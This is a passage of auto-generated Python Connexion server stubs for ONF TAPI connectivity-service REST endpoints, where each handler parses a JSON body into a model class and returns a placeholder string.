:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_post(uuid, local_id, tapi_common_bandwidth_profile=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_post
creates tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_bandwidth_profile: tapi.common.BandwidthProfile to be added to list
:type tapi_common_bandwidth_profile: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_bandwidth_profile = TapiCommonBandwidthProfile.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_put(uuid, local_id, tapi_common_bandwidth_profile=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_put
creates or updates tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_bandwidth_profile: tapi.common.BandwidthProfile to be added or updated
:type tapi_common_bandwidth_profile: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_bandwidth_profile = TapiCommonBandwidthProfile.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_delete
removes tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_get
returns tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacity
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_post(uuid, local_id, tapi_common_capacity=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_post
creates tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity: tapi.common.Capacity to be added to list
:type tapi_common_capacity: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity = TapiCommonCapacity.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_put(uuid, local_id, tapi_common_capacity=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_put
creates or updates tapi.common.Capacity # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity: tapi.common.Capacity to be added or updated
:type tapi_common_capacity: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity = TapiCommonCapacity.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_total_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get(uuid, local_id, topology_uuid, node_uuid, node_edge_point_uuid, connection_end_point_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get
returns tapi.connectivity.ConnectionEndPointRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param topology_uuid: Id of connection-end-point
:type topology_uuid: str
:param node_uuid: Id of connection-end-point
:type node_uuid: str
:param node_edge_point_uuid: Id of connection-end-point
:type node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:rtype: TapiConnectivityConnectionEndPointRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_delete
removes tapi.connectivity.connectivityservice.EndPoint # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_get
returns tapi.connectivity.connectivityservice.EndPoint # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiConnectivityConnectivityserviceEndPoint
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_name_post(uuid, local_id, tapi_common_name_and_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_delete(uuid, local_id, value_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_delete
removes tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param value_name: Id of name
:type value_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_get(uuid, local_id, value_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_post(uuid, local_id, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_put(uuid, local_id, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_namevalue_name_put
creates or updates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_post(uuid, local_id, tapi_connectivity_connectivityservice_end_point=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_post
creates tapi.connectivity.connectivityservice.EndPoint # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_connectivity_connectivityservice_end_point: tapi.connectivity.connectivityservice.EndPoint to be added to list
:type tapi_connectivity_connectivityservice_end_point: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivityservice_end_point = TapiConnectivityConnectivityserviceEndPoint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_put(uuid, local_id, tapi_connectivity_connectivityservice_end_point=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_put
creates or updates tapi.connectivity.connectivityservice.EndPoint # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_connectivity_connectivityservice_end_point: tapi.connectivity.connectivityservice.EndPoint to be added or updated
:type tapi_connectivity_connectivityservice_end_point: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivityservice_end_point = TapiConnectivityConnectivityserviceEndPoint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_delete
removes tapi.common.ServiceInterfacePointRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_get
returns tapi.common.ServiceInterfacePointRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonServiceInterfacePointRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_post(uuid, local_id, tapi_common_service_interface_point_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_post
creates tapi.common.ServiceInterfacePointRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_service_interface_point_ref: tapi.common.ServiceInterfacePointRef to be added to list
:type tapi_common_service_interface_point_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_service_interface_point_ref = TapiCommonServiceInterfacePointRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_put(uuid, local_id, tapi_common_service_interface_point_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_service_interface_point_put
creates or updates tapi.common.ServiceInterfacePointRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_service_interface_point_ref: tapi.common.ServiceInterfacePointRef to be added or updated
:type tapi_common_service_interface_point_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_service_interface_point_ref = TapiCommonServiceInterfacePointRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_exclude_linktopology_uuidlink_uuid_get(uuid, topology_uuid, link_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_exclude_linktopology_uuidlink_uuid_get
returns tapi.topology.LinkRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param topology_uuid: Id of exclude-link
:type topology_uuid: str
:param link_uuid: Id of exclude-link
:type link_uuid: str
:rtype: TapiTopologyLinkRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_exclude_nodetopology_uuidnode_uuid_get(uuid, topology_uuid, node_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_exclude_nodetopology_uuidnode_uuid_get
returns tapi.topology.NodeRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param topology_uuid: Id of exclude-node
:type topology_uuid: str
:param node_uuid: Id of exclude-node
:type node_uuid: str
:rtype: TapiTopologyNodeRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_exclude_pathpath_uuid_get(uuid, path_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_exclude_pathpath_uuid_get
returns tapi.path.computation.PathRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param path_uuid: Id of exclude-path
:type path_uuid: str
:rtype: TapiPathComputationPathRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_get
returns tapi.connectivity.connectivitycontext.ConnectivityService # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiConnectivityConnectivitycontextConnectivityService
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_include_linktopology_uuidlink_uuid_get(uuid, topology_uuid, link_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_include_linktopology_uuidlink_uuid_get
returns tapi.topology.LinkRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param topology_uuid: Id of include-link
:type topology_uuid: str
:param link_uuid: Id of include-link
:type link_uuid: str
:rtype: TapiTopologyLinkRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_include_nodetopology_uuidnode_uuid_get(uuid, topology_uuid, node_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_include_nodetopology_uuidnode_uuid_get
returns tapi.topology.NodeRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param topology_uuid: Id of include-node
:type topology_uuid: str
:param node_uuid: Id of include-node
:type node_uuid: str
:rtype: TapiTopologyNodeRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_include_pathpath_uuid_get(uuid, path_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_include_pathpath_uuid_get
returns tapi.path.computation.PathRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param path_uuid: Id of include-path
:type path_uuid: str
:rtype: TapiPathComputationPathRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_include_topologytopology_uuid_get(uuid, topology_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_include_topologytopology_uuid_get
returns tapi.topology.TopologyRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param topology_uuid: Id of include-topology
:type topology_uuid: str
:rtype: TapiTopologyTopologyRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_latency_characteristic_post(uuid, tapi_topology_latency_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_latency_characteristic_post
creates tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_topology_latency_characteristic: tapi.topology.LatencyCharacteristic to be added to list
:type tapi_topology_latency_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_latency_characteristic = TapiTopologyLatencyCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_delete(uuid, traffic_property_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_delete
removes tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_get(uuid, traffic_property_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_get
returns tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:rtype: TapiTopologyLatencyCharacteristic
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_post(uuid, traffic_property_name, tapi_topology_latency_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_post
creates tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:param tapi_topology_latency_characteristic: tapi.topology.LatencyCharacteristic to be added to list
:type tapi_topology_latency_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_latency_characteristic = TapiTopologyLatencyCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_put(uuid, traffic_property_name, tapi_topology_latency_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_latency_characteristictraffic_property_name_put
creates or updates tapi.topology.LatencyCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param traffic_property_name: Id of latency-characteristic
:type traffic_property_name: str
:param tapi_topology_latency_characteristic: tapi.topology.LatencyCharacteristic to be added or updated
:type tapi_topology_latency_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_latency_characteristic = TapiTopologyLatencyCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_delete(uuid, value_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_delete
removes tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_get(uuid, value_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_namevalue_name_put
creates or updates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_post(uuid, tapi_connectivity_connectivitycontext_connectivity_service=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_post
creates tapi.connectivity.connectivitycontext.ConnectivityService # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_connectivity_connectivitycontext_connectivity_service: tapi.connectivity.connectivitycontext.ConnectivityService to be added to list
:type tapi_connectivity_connectivitycontext_connectivity_service: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivitycontext_connectivity_service = TapiConnectivityConnectivitycontextConnectivityService.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_put(uuid, tapi_connectivity_connectivitycontext_connectivity_service=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_put
creates or updates tapi.connectivity.connectivitycontext.ConnectivityService # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_connectivity_connectivitycontext_connectivity_service: tapi.connectivity.connectivitycontext.ConnectivityService to be added or updated
:type tapi_connectivity_connectivitycontext_connectivity_service: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivitycontext_connectivity_service = TapiConnectivityConnectivitycontextConnectivityService.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_post(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_put(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_burst_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_post(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_put(uuid, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_committed_information_rate_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_delete
removes tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_requested_capacity_bandwidth_profile_get
returns tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiCommonBandwidthProfile
"""
